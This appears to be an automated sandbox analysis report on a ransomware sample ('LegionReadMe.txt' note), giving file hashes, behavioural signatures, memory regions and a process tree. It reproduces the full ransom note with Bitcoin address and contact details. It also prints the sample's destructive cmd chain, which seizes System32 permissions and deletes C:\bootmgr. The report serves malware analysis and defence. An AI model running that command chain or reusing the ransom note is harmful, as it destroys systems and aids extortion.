Analysis

  • max time kernel
    122s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    29-12-2023 21:51

General

  • Target

    04df8dd30da8b5853f48cc1ac9b695a8.exe

  • Size

    6.1MB

  • MD5

    04df8dd30da8b5853f48cc1ac9b695a8

  • SHA1

    4c02262c2fea0e99277a99dcbe28a9c370b87c39

  • SHA256

    78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201

  • SHA512

    3ad10c1512e316ff9d02bd5b4573298ae2f6fc8f9d56c66e2c5c4d95fe046e5b14b09e63cea9bca778560ce4b568ebdf70d66a0225b2eaf7e6cd3ba914583b7e

  • SSDEEP

    3072:jnsbblTAByHNgb0nbYlwKsw962CpJid72gqV/6c4LNobbamucc3OD4iEDzyEaE0u:jnsq7hQplBdJ7bP4L8rVE

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt

Ransom Note
Ooops! All your important files are encrypted! What happend to my computer? All your important files are encrypted. No one can help you to restore files without our special decryptor. Backups were either encrypted or deleted. Shadow copies also removed. If you want to restore some of your files for free write to email (contact is below) and attach 2-3 encrypted files. You will receive decrypted samples. To decrypt other files you have to pay $50. How do i pay? Payment is accepted in Bitcoin only. Please check the current price of Bitcoin and buy some Bitcoins. And send the correct amount to the address specified at the bottom of the sheet. Contact: 1.Download Tor browser (https://www.torproject.org/) 2.Create account on mail2tor (http://mail2tor2zyjdctd.onion/) 3.Write email to us ([email protected]) In case of no anwser in 72 hours write us to this email: [email protected] What if i already paid? Send your Bitcoin wallet ID to e-mail provided above. Attention! 1.Do not modify encrypted files. 2.Do not try decrypt your data using third party software, it may cause pernament data loss. Our Bitcoin address: 131fjhrB4wH8j6adZXudp1Wn23pR33tpAh
Wallets

131fjhrB4wH8j6adZXudp1Wn23pR33tpAh

URLs

http://mail2tor2zyjdctd.onion/

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Renames multiple (144) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Disables Task Manager via registry modification
  • Possible privilege escalation attempt 7 IoCs
  • Modifies file permissions 1 TTPs 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\04df8dd30da8b5853f48cc1ac9b695a8.exe
    "C:\Users\Admin\AppData\Local\Temp\04df8dd30da8b5853f48cc1ac9b695a8.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Sets desktop wallpaper using registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1740
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2992
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32 /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2876
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\drivers
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2808
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\drivers /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:3012
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\LogonUI.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2692
      • C:\Windows\system32\takeown.exe
        takeown /f C:\bootmgr
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2308
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\LogonUI.exe /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:3008
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1876
      • C:\Windows\system32\rundll32.exe
        rundll32 user32.dll,UpdatePerUserSystemParameters
        3⤵
          PID:848
      • C:\Windows\system32\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:2536
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 3040 -s 900
        2⤵
          PID:2920

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000005.log

        Filesize

        16B

        MD5

        79bb29efb8fb96f11016ce4754e80b6b

        SHA1

        9ed8d422a9926e01c03bff38c34beadf2522ca7c

        SHA256

        5de2e6ca20d8f3b3a7683cce544979246d9eb2f27a94c184d9a50775ebb7ca02

        SHA512

        d742556f9751c6f73dcc2d80fb5e8643fb1613ea4a67cf923c52c310864b6dde95a3a8e4d02c8309c8778e9cab75d528b52e30988a6eedbadbeb61c0ba76df51

      • C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt

        Filesize

        1KB

        MD5

        7db09a04d53ec49b19596d7836ac2286

        SHA1

        f92b734a6fd58d4a729d14f32bd69d588d03fb70

        SHA256

        eb07471b556a3a18b04c9f14d98f0d8345f6a249a74eea2148af19b50c97c5e7

        SHA512

        fc597891e55cfd69aaf709d20f89c088c6e4632a0f1b3286aaee2d22f98a7f01aaff1f8ec2660086f3434a02d4ea9fa0a5df60eac95abe9be56be8aee6d92897

      • memory/3040-110-0x000007FEF54A0000-0x000007FEF5E8C000-memory.dmp

        Filesize

        9.9MB

      • memory/3040-327-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

      • memory/3040-0-0x0000000000940000-0x0000000000F60000-memory.dmp

        Filesize

        6.1MB

      • memory/3040-145-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

      • memory/3040-323-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

      • memory/3040-324-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

      • memory/3040-1-0x000007FEF54A0000-0x000007FEF5E8C000-memory.dmp

        Filesize

        9.9MB

      • memory/3040-2-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

      • memory/3040-328-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

      • memory/3040-329-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

      • memory/3040-330-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

      • memory/3040-331-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

      • memory/3040-332-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

      • memory/3040-333-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB

      • memory/3040-334-0x000000001B5D0000-0x000000001B650000-memory.dmp

        Filesize

        512KB